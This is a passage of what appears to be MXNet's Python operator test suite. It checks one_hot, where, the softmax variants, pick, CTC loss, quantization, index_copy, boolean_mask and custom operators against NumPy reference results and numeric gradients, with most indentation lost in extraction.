dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
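        # Reference implementation of `where`: if `condition` has the same shape as x/y,
        # the selection is elementwise; if it is a vector of length x.shape[0], the
        # selection is made per row (per leading-axis slice).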
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert same(expect_out, out)
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
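        # Reference: softmax is taken over only the first length[i, j] entries along
        # axis 1; the remaining (masked) positions stay zero.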
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # test forward in training mode (with grad calc)
    exe.forward(is_train=True)
    out_with_grad = exe.outputs[0].copy()
    # test forward in inference mode (without grad calc)
    exe.forward(is_train=False)
    out_no_grad = exe.outputs[0]
    # make sure losses calculated in both modes are the same
    assert_almost_equal(out_with_grad, out_no_grad)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(out_no_grad, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
    # Test 1: identical batch entries should produce identical losses; values checked against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
    # Test 2: batch entries with different activations and labels
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
    # Test 3: check that integer-typed labels work
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
@with_seed()
def test_ctc_loss_grad():
    def check_ctc_loss_grad(blank_label, contrib=False):  # reference values ported from TensorFlow's CTC tests
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
    # test gradient accumulation with grad_req='add' over multiple backward passes
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
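    # Expected gradient: each row contributes 1 for every mask (bi and ci) that selects
    # it, and with grad_req='add' the contributions accumulate over the T iterations,
    # so grad = T * (bi + ci) broadcast across each row.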
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
    # contributions accumulate over the T backward passes
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
